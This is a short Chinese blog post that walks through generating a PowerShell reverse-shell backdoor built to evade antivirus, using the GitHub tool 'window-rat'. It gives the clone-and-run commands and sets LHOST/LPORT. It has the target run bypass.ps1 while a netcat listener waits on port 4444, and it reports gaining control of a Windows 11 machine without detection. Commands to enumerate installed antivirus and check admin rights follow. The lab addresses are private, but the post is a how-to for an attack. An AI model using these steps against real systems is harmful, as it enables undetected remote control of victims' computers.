PowerShell Payload后门免杀主流杀毒软件

 PowerShell Payload 后门测试

目标机:Windows 11  IP:192.168.120.164

攻击机:Kali   IP:192.168.120.133

 测试项目:https://github.com/machine1337/window-rat

cd /opt
git clone https://github.com/machine1337/window-rat.git
cd window-rat
chmod +x  exploit.sh
./exploit.sh

 出现以下这个页面就证明可以满足条件,接下来配置相关参数即可

Select:1 (·选择攻击类型)

Select:2 (选择局域网)

 这里一选项为广域网,二为局域网。我在这里的话选二。

LHOST 输入攻击机IP地址

LPORT 输入反弹至攻击机的端口

生成PowerShell如下:

输出的Payload位置:当前目录下的子目录中/output/bypass.ps1

目标机执行脚本,攻击机启用监听设置端口。

nc -lvnp 4444

杀毒软件没有报毒,成功拿到Windows控制权。

列出当前所安装的杀毒软件:

Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct

 

 查看是否具有管理员权限提升:

If (([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) { echo "yes"; } else { echo "no"; }

回显yes,证明具有权限提升。

🍜完!!!

 

 

  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 6
    评论
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

shellpei

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值